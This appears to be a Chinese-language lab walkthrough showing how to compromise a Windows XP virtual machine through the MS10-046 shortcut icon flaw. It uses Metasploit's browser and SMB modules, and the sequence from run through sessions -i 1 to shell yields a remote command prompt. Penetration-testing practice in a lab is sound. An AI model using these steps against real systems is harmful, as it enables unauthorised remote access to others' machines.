使用ms10_046對xp系統進行滲透
本實驗在虛擬機器環境下進行!!!
準備:
Kali 192.168.88.105
Xp 192.168.88.106
這個是一個圖示漏洞,所以我們只需要設定好引數,等待靶機訪問即可
進入msfconsole
search ms10_046 查詢相應的模組
這裡可以看到,有兩個可用於攻擊的模組,但一個是browser一個是smb,我們先試試browser的行不行
使用模組
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
檢視可以滲透的目標
show targets
看到是Automatic,說明都可以
檢視選項引數
show options
可以看到,預設已經把引數設定好了,我們只管run即可
run執行
可以看到,他說傳送了客戶端在\\192.168.88.105\LNivjPN\這個地址上
我們用xp來訪問一下
就兩個看起來與世無爭的小東西
但我們的kali湧出了大量資訊
那麼大一段字不重要,重要的是箭頭所指處,session會話已經建立
我們sessions來看看現在建立了那些會話
可以看到,sessions列表中已經有了我們的xp了
我們用sessions -i 1來連線xp
可以看到,已經連線成功了
我們使用shell來獲取xp的shell
看到命令提示符已經變成了window下的cmd了,說明滲透成功
再試試另一個模組可不可以
use exploit/windows/smb/ms10_046_shortcut_icon_dllloader
run 執行
可以看到,它說要去訪問\\192.168.88.105\WUMiC\EbWWhz.dll這個路徑
我們進入xp,進行訪問
開啟方式選記事本,可以看到,kali那裡返回了資訊
他說那個lnk檔案也必須被髮送
這個兩個檔案分開的,不太好弄,不如上一個模組。所以我們ctrl+c停止執行,不使用這個模組了。。。